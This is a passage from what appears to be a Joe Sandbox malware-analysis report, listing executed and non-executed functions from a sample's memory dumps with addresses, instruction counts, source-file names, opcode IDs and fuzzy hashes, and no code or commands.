                                                                                                • Opcode ID: f5c9dfbad749fefabaa9c22527e78a0228a6955e812520a631be3388ca617fcd
                                                                                                • Instruction ID: 0a53e1e47baaf7d906908903439a69711b9bbe004bcf4cd8b19a67521ae0bfa6
                                                                                                • Opcode Fuzzy Hash: f5c9dfbad749fefabaa9c22527e78a0228a6955e812520a631be3388ca617fcd
                                                                                                • Instruction Fuzzy Hash: 25816F30608A4D8FDB68DF28D8957F937E1FF58316F14423EE84EC7292CA74A9458B81
                                                                                                Function 00007FFD9BC7C94C Relevance: 1.7, APIs: 1, Instructions: 238COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1850788531.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_7ffd9bc70000_4si9noTBNw.jbxd
                                                                                                Similarity
                                                                                                • API ID: FullImageNameProcessQuery
                                                                                                • String ID:
                                                                                                • API String ID: 3578328331-0
                                                                                                • Opcode ID: 02ba85268388270c085b30af681a0940bec2fe7fcb104e71bb7f212714e5f1d1
                                                                                                • Instruction ID: 1efec157ecb26d101aea94ceea6461794527ba1668f19675451323ddffa93ab5
                                                                                                • Opcode Fuzzy Hash: 02ba85268388270c085b30af681a0940bec2fe7fcb104e71bb7f212714e5f1d1
                                                                                                • Instruction Fuzzy Hash: FE718530618A8D8FDB68DF28D8957F937D1FB59312F14423EE84EC7292CB74A9458B81
                                                                                                Function 00007FFD9B8808D0 Relevance: .2, Instructions: 161COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1847957012.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_7ffd9b880000_4si9noTBNw.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 6a2b6d195a8d03d74b7210f5451dc572900e2644e0ff4a3622e3a08093855c7f
                                                                                                • Instruction ID: c2826a642cf60bd647bb9da7009ff1126a70f5b80189cac83e3b27c0ec7d3a4d
                                                                                                • Opcode Fuzzy Hash: 6a2b6d195a8d03d74b7210f5451dc572900e2644e0ff4a3622e3a08093855c7f
                                                                                                • Instruction Fuzzy Hash: 35419F12B0DA695FE309B7B874AA5F87B91DF49325B0400FFC05ECB1E7DD28A8428281
                                                                                                Function 00007FFD9B880910 Relevance: .2, Instructions: 150COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1847957012.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_7ffd9b880000_4si9noTBNw.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 62b81a85e98e4fcea221cea09ff91d3f13aa7af30e844e62f7cb061d07c1ab4e
                                                                                                • Instruction ID: 2aa0bc1e2e30d2882fbedc7211689eaf48cd90ed5a8e04d0748803c9f5db62ab
                                                                                                • Opcode Fuzzy Hash: 62b81a85e98e4fcea221cea09ff91d3f13aa7af30e844e62f7cb061d07c1ab4e
                                                                                                • Instruction Fuzzy Hash: 07414D12B1DA695FE319B7B874AA5F87B91DF49324B0400FFD05EC71E7DD28A8428281
                                                                                                Function 00007FFD9B880960 Relevance: .1, Instructions: 115COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1847957012.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_7ffd9b880000_4si9noTBNw.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 366ef1a2a3fc5824295586522a7024d563ab8e33468d5429d3099753ade7382c
                                                                                                • Instruction ID: a53e9d55dca38c4e63f944b27f824f1d8110977ee2d5d4dc2e0811c854b351f4
                                                                                                • Opcode Fuzzy Hash: 366ef1a2a3fc5824295586522a7024d563ab8e33468d5429d3099753ade7382c
                                                                                                • Instruction Fuzzy Hash: 5831F721B1DA691FE358B7B8786A5B977D2DF49325B0400FFD41EC71E7DC28A8418281
                                                                                                Function 00007FFD9B881171 Relevance: .1, Instructions: 106COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1847957012.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_7ffd9b880000_4si9noTBNw.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 8e07c6b763df4e0f2711a7120aea3087d8955d84cb23e5ad42e2bdb2e9b529fb
                                                                                                • Instruction ID: c2c15329a28366fd2259b12584bd65151f38319b5eb2dcdf148dcf4138eb9049
                                                                                                • Opcode Fuzzy Hash: 8e07c6b763df4e0f2711a7120aea3087d8955d84cb23e5ad42e2bdb2e9b529fb
                                                                                                • Instruction Fuzzy Hash: EF31FA30A0DA4A8FDB56EB74C8649A97BF1FF5E310B0905FAC059C71A2DE386541C740
                                                                                                Function 00007FFD9B880998 Relevance: .1, Instructions: 104COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1847957012.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_7ffd9b880000_4si9noTBNw.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: dd8e0baa3740fff66ff363364a1d6b725da1f1293f1d1a0a098e523cbb8efcc7
                                                                                                • Instruction ID: c1df2d0e2bcd684bcbf06d11809609b7ccf8deb9f36729178e0ebdb27e5bb441
                                                                                                • Opcode Fuzzy Hash: dd8e0baa3740fff66ff363364a1d6b725da1f1293f1d1a0a098e523cbb8efcc7
                                                                                                • Instruction Fuzzy Hash: 4431F420B19E5D1FE798F768846AA7A7BD2EF58315B1400BDE40EC72F7DD38A8418281
                                                                                                Function 00007FFD9B880C25 Relevance: .1, Instructions: 88COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1847957012.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_7ffd9b880000_4si9noTBNw.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: ec288fe452075a308799e8618926923c138db70320c6b991da7ff6bf7a74b95c
                                                                                                • Instruction ID: 55a89c2853c2ec3d53b50e70509c4a93600150b4fa32b02a41995c99840a0d1a
                                                                                                • Opcode Fuzzy Hash: ec288fe452075a308799e8618926923c138db70320c6b991da7ff6bf7a74b95c
                                                                                                • Instruction Fuzzy Hash: F3214135F1DA5D8FE722ABB898250DC7B60DF85724F0545F3C058CB1D3D9382A869751
                                                                                                Function 00007FFD9B884C51 Relevance: .1, Instructions: 85COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1847957012.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_7ffd9b880000_4si9noTBNw.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 563f0b22c3d044ed18b643793d457ebfd6bd2ab87447492000b7ca279dad1163
                                                                                                • Instruction ID: 2bf4e0488b6b47eafe376f9cc647d8b7df82179f9b59ec907397f79a1c5a7371
                                                                                                • Opcode Fuzzy Hash: 563f0b22c3d044ed18b643793d457ebfd6bd2ab87447492000b7ca279dad1163
                                                                                                • Instruction Fuzzy Hash: A9310E31E1895D8FDB64EB54C8647A972A1FB5C324F1501BDD41ED32E1CA396E81CB41
                                                                                                Function 00007FFD9B882B87 Relevance: .1, Instructions: 53COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1847957012.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_7ffd9b880000_4si9noTBNw.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 238400861e6bb96cff992512771ff10c255969b126e5c8553c26992fe359df77
                                                                                                • Instruction ID: dfd89235822056c8b69d429db7ad6e2f1b440916286932d9c79c208a29ba7e54
                                                                                                • Opcode Fuzzy Hash: 238400861e6bb96cff992512771ff10c255969b126e5c8553c26992fe359df77
                                                                                                • Instruction Fuzzy Hash: 42110C20B1AD0E8FEBA4EF9488A57B86291EF5C301F5500B9C41ED72B2DE38AA448710
                                                                                                Function 00007FFD9B880C40 Relevance: .1, Instructions: 52COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1847957012.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_7ffd9b880000_4si9noTBNw.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 665f7e3b0328a40e55430b111ac90f6e926e8792a51fdb39136e9e57ea7783af
                                                                                                • Instruction ID: 26db16c5fa50d79b017cae106418b5f22e7ef867c3ad606ca9b1458e48d68e03
                                                                                                • Opcode Fuzzy Hash: 665f7e3b0328a40e55430b111ac90f6e926e8792a51fdb39136e9e57ea7783af
                                                                                                • Instruction Fuzzy Hash: 6711A535F1EA8D8FE722DFA4886109C7FB1EF56714F0645F7C054DB2A2D9386A458780
                                                                                                Function 00007FFD9B882C52 Relevance: .0, Instructions: 50COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1847957012.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_7ffd9b880000_4si9noTBNw.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: c13e825169c82e0260183b0dfc059ff39dc103e1a37d20102da221b4f3c6b246
                                                                                                • Instruction ID: d7254e299d0c61633fd50ebeeaaf2b73b15b763aa472bfd5dc29bfbfdbf89828
                                                                                                • Opcode Fuzzy Hash: c13e825169c82e0260183b0dfc059ff39dc103e1a37d20102da221b4f3c6b246
                                                                                                • Instruction Fuzzy Hash: 88011E21B1ED0D8BEB64EF9884A967823D2DF98710F1601B9D41AC72B2DD29AA418640
                                                                                                Function 00007FFD9B880C48 Relevance: .0, Instructions: 46COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1847957012.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_7ffd9b880000_4si9noTBNw.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: b39d6a24626195700fe8ed6302a6b8b01df6becabbf02b307f685f37f56cca8e
                                                                                                • Instruction ID: 37f4339d33d39cd644b4e054429b46a73f4236abb15be0902c5367a7f2ccc744
                                                                                                • Opcode Fuzzy Hash: b39d6a24626195700fe8ed6302a6b8b01df6becabbf02b307f685f37f56cca8e
                                                                                                • Instruction Fuzzy Hash: 16018031E1EA8D8FE726DFA4886009C7FB1EF56714F1641F7C054DB2A2D9386A458780
                                                                                                Function 00007FFD9B880C50 Relevance: .0, Instructions: 41COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1847957012.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_7ffd9b880000_4si9noTBNw.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 7131764b9d236f84a0f87fec85c2f1fb2aa962a93aabee54dfc81182e2b9ef43
                                                                                                • Instruction ID: ab549e4678b7e4c45d7e8f1cb7bdd6f99b81eebfd3eb537bd9fa5e315a024334
                                                                                                • Opcode Fuzzy Hash: 7131764b9d236f84a0f87fec85c2f1fb2aa962a93aabee54dfc81182e2b9ef43
                                                                                                • Instruction Fuzzy Hash: 1E017130E1EA8D9FE726DBA4886409C7FB1EF16714F1541F7C064DB2A2D9386A458740
                                                                                                Function 00007FFD9B880B77 Relevance: .0, Instructions: 35COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1847957012.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_7ffd9b880000_4si9noTBNw.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 5acfba0c6562c1a10888a60ca85a97accb6bc6a61a5cee94002c2ef2ec7bf432
                                                                                                • Instruction ID: 151c55b265a01e6ce15db80c3ec4cd1c7d0dd1998e198a8455df0b391c39d4f6
                                                                                                • Opcode Fuzzy Hash: 5acfba0c6562c1a10888a60ca85a97accb6bc6a61a5cee94002c2ef2ec7bf432
                                                                                                • Instruction Fuzzy Hash: FAF0553120D649CFC706AB3CC8958C43B60EB87225B8A10FAC089CB9A2C2281C5FCB00
                                                                                                Function 00007FFD9B882C9D Relevance: .0, Instructions: 35COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1847957012.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_7ffd9b880000_4si9noTBNw.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: b6e0be89d3b27c2fa4f56752da0536672b2e1be42a0abed2b0df82e3ba76eaa2
                                                                                                • Instruction ID: 8629ccb71356551793cb72b9435150d64bf50a69d22b91340b35a22e1fcecbb4
                                                                                                • Opcode Fuzzy Hash: b6e0be89d3b27c2fa4f56752da0536672b2e1be42a0abed2b0df82e3ba76eaa2
                                                                                                • Instruction Fuzzy Hash: 9EF0F434A1AD0E8BEBA4FFC0C8A46B87361EF58311F510179C41AD72B1CE386A85C700
                                                                                                Function 00007FFD9B881DE1 Relevance: .0, Instructions: 30COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1847957012.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_7ffd9b880000_4si9noTBNw.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: ae500bbb4c841754f7a3da89dba62ce1643f05e4494f5e9b5ba89b9c45e3be6a
                                                                                                • Instruction ID: 00c3183e3ecbafa028da39b53966922bf2f059327c656efd56f26fdad59fe715
                                                                                                • Opcode Fuzzy Hash: ae500bbb4c841754f7a3da89dba62ce1643f05e4494f5e9b5ba89b9c45e3be6a
                                                                                                • Instruction Fuzzy Hash: 43F03A61F2AD2E4BF7B0F79484A53B822D1AF1C710F1A0071D46DE22B1CE3CAE814A42
                                                                                                Function 00007FFD9B882BC6 Relevance: .0, Instructions: 30COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1847957012.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_7ffd9b880000_4si9noTBNw.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 8c0c53da2c1fdb609a134df8646e88899382bc2d5736a2a9e3705598f2c545c1
                                                                                                • Instruction ID: 938b93f7eb412964e14054d9f2b4f6d1dd7efd82c935e5241432befb80103025
                                                                                                • Opcode Fuzzy Hash: 8c0c53da2c1fdb609a134df8646e88899382bc2d5736a2a9e3705598f2c545c1
                                                                                                • Instruction Fuzzy Hash: 9DF0D020B1AD0D8BEBB0EF84C9A47B93352EF58311F1141B9C91AD72B2DD396E458650
                                                                                                Function 00007FFD9B880D02 Relevance: .0, Instructions: 28COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1847957012.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_7ffd9b880000_4si9noTBNw.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 89f7c6c295d178cdf19de25ef777ccdab4bbee6c0f9d830b1345820fd20f75a1
                                                                                                • Instruction ID: b317d4bbbda63b0515e671cc07fe9b168132af5cdce32671af0d157f573d6674
                                                                                                • Opcode Fuzzy Hash: 89f7c6c295d178cdf19de25ef777ccdab4bbee6c0f9d830b1345820fd20f75a1
                                                                                                • Instruction Fuzzy Hash: 45F0B430B19A0ECBE754DFA4C8A56B977E1EB58711F1482BAD019C32E5DD3866848B40
                                                                                                Function 00007FFD9B8829F8 Relevance: .0, Instructions: 25COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1847957012.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_7ffd9b880000_4si9noTBNw.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 840cdf2471a1a48cf32cefe2ea524713a4c46192b12f554c2e88aca2b7cad671
                                                                                                • Instruction ID: 21c8b316c0238ebee1c245d99acbf127710beab35ddb3fd1c9b14a7d9663d1e9
                                                                                                • Opcode Fuzzy Hash: 840cdf2471a1a48cf32cefe2ea524713a4c46192b12f554c2e88aca2b7cad671
                                                                                                • Instruction Fuzzy Hash: 30E06D61F2AC1E0BE6F0FB5880A57B822D2AB5C740B020071C02ED22B1CE3C6D814741
                                                                                                Function 00007FFD9B885A16 Relevance: .0, Instructions: 23COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1847957012.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_7ffd9b880000_4si9noTBNw.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 41d01b9cfe46696a43681bb52f9c850f3c8fa1cb72eaeae39a632c6c338e4a46
                                                                                                • Instruction ID: a9f22208ca336b7cba757f9b5b503bf807d2286f0425036eb3f9635939e61683
                                                                                                • Opcode Fuzzy Hash: 41d01b9cfe46696a43681bb52f9c850f3c8fa1cb72eaeae39a632c6c338e4a46
                                                                                                • Instruction Fuzzy Hash: F8E0DF71F29C2A0BE7B0F75884A66B427D1EB1C340F1101B2C828D32A1DE38AD824B81
                                                                                                Function 00007FFD9B881295 Relevance: .0, Instructions: 16COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1847957012.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_7ffd9b880000_4si9noTBNw.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 3df2e20900c570906db27adbae3d6f8ea5aeedfe203fcbe82b4dd121bfe82078
                                                                                                • Instruction ID: 212d94868e6fdefa3572a50cd443aee5e06c3b52bff4f9ea9f74f919bb0b426a
                                                                                                • Opcode Fuzzy Hash: 3df2e20900c570906db27adbae3d6f8ea5aeedfe203fcbe82b4dd121bfe82078
                                                                                                • Instruction Fuzzy Hash: D5C01214B5780A52D02873A9FD664E97780DF4C228BC54071E01D85096DD5A15878196
                                                                                                Function 00007FFD9B8806A5 Relevance: .0, Instructions: 13COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1847957012.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_7ffd9b880000_4si9noTBNw.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: f6fd75930d1efeb94d8439de6f17ce87baadd0a69eaea07f9eddc42f85e34070
                                                                                                • Instruction ID: 21cc1f12559d4b8ff44f8c8ceb0d7f4e3b25e9d01c159eaac7b377653f6eb0aa
                                                                                                • Opcode Fuzzy Hash: f6fd75930d1efeb94d8439de6f17ce87baadd0a69eaea07f9eddc42f85e34070
                                                                                                • Instruction Fuzzy Hash: 7FC04C05F6FE5F43F835B3EE98660ACA1405FDDA14FE70172D56C801F29C6E22D5419A
                                                                                                Function 00007FFD9B8812B8 Relevance: .0, Instructions: 12COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1847957012.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_7ffd9b880000_4si9noTBNw.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 2118bf5cbd7652e4d7e413182c64878a5aedab47cc3b41951ae0b3348f6e1aca
                                                                                                • Instruction ID: 117d9e4f7a837945b06f25a181308a6cffb83ffe29f31610afb6623c60c79188
                                                                                                • Opcode Fuzzy Hash: 2118bf5cbd7652e4d7e413182c64878a5aedab47cc3b41951ae0b3348f6e1aca
                                                                                                • Instruction Fuzzy Hash: 45C08C30611C0C8FC908EB28C88480433A0FB0D200BC200E0E009C71B0D229ECC0C740
                                                                                                Function 00007FFD9B883DB4 Relevance: .0, Instructions: 11COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1847957012.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_7ffd9b880000_4si9noTBNw.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: d6da0660a00101ada1d56075835bcfda281a1e86d4fb2957990c9d5af3e0e989
                                                                                                • Instruction ID: a3507932bc91c138a1504ddb05cffebc8308c94cbddcb17b9f05c2fbe9da2456
                                                                                                • Opcode Fuzzy Hash: d6da0660a00101ada1d56075835bcfda281a1e86d4fb2957990c9d5af3e0e989
                                                                                                • Instruction Fuzzy Hash: DBC0EA20F2AD1E9BEAA8B3A484662B951C65F4C704B560474D1AEE32E3DD2DAA404A40
                                                                                                Function 00007FFD9B886802 Relevance: .0, Instructions: 10COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1847957012.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_7ffd9b880000_4si9noTBNw.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: c6ef416c16fde88c947d5eb0b613ec7d1272246296cc6fcae4ddc785cef355d4
                                                                                                • Instruction ID: 4429feac776f7b268b6d1f8d7e862dcd6e3f2eb3f870b3245e0d11505dbf13b1
                                                                                                • Opcode Fuzzy Hash: c6ef416c16fde88c947d5eb0b613ec7d1272246296cc6fcae4ddc785cef355d4
                                                                                                • Instruction Fuzzy Hash: B8C04C14F59C2A47E369A214583567E04929B48758F950074E46D976DECE1C6A1212C7
                                                                                                Function 00007FFD9B8806C8 Relevance: .0, Instructions: 8COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1847957012.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_7ffd9b880000_4si9noTBNw.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 1331302ace8906dc7ff6d84222f3b4709e12167f194fc678014da51f1390e612
                                                                                                • Instruction ID: ce67ef7fc0b35975dd430fcfbe058d3c70e3b4322f25a17c9a31355b33c2b72f
                                                                                                • Opcode Fuzzy Hash: 1331302ace8906dc7ff6d84222f3b4709e12167f194fc678014da51f1390e612
                                                                                                • Instruction Fuzzy Hash: 6DB01200D6BC4F02E42433FB0C5306470405F8C104FC30070D46C801A2985E129402C6

                                                                                                Non-executed Functions

                                                                                                Function 00007FFD9BC790F0 Relevance: 3.9, Strings: 3, Instructions: 137COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1850788531.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_7ffd9bc70000_4si9noTBNw.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 0319_64\System.Management\8af759007c012da690062882e06694f1\System.Management.ni.dll",0$F%OB$J$7J
                                                                                                • API String ID: 0-1736064201
                                                                                                • Opcode ID: fbf33ddcd35f2baa1343a7352f752eb6920df28396bba662dca4ae063c50cb76
                                                                                                • Instruction ID: 94fca5096c23ff82bb077145c0014fad57f8763706950f56d561df0d439783db
                                                                                                • Opcode Fuzzy Hash: fbf33ddcd35f2baa1343a7352f752eb6920df28396bba662dca4ae063c50cb76
                                                                                                • Instruction Fuzzy Hash: 8F511C30A1951D8FDB58EF68C8A5ABE77B2FF58304F414079D01AE72A6CF79A941CB40
                                                                                                Function 00007FFD9BC78F48 Relevance: 2.7, Strings: 2, Instructions: 201COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1850788531.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_7ffd9bc70000_4si9noTBNw.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: F%OB$J$7J
                                                                                                • API String ID: 0-4083579901
                                                                                                • Opcode ID: af226ff24483df4a7a64e47d930d591d564ae4cd98c9e9a4c29bcbe2828a0591
                                                                                                • Instruction ID: 1a5b3c05c11a62a09c149fb7b4ce473cb6d17c94288aaaa50a9504b81643aa1f
                                                                                                • Opcode Fuzzy Hash: af226ff24483df4a7a64e47d930d591d564ae4cd98c9e9a4c29bcbe2828a0591
                                                                                                • Instruction Fuzzy Hash: 6F71B230A0954D8FDB64EF68C8A9AAD77F2FF48300F454479D05ADB2A6DF39A941C780
                                                                                                Function 00007FFD9BC7B90D Relevance: .5, Instructions: 532COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
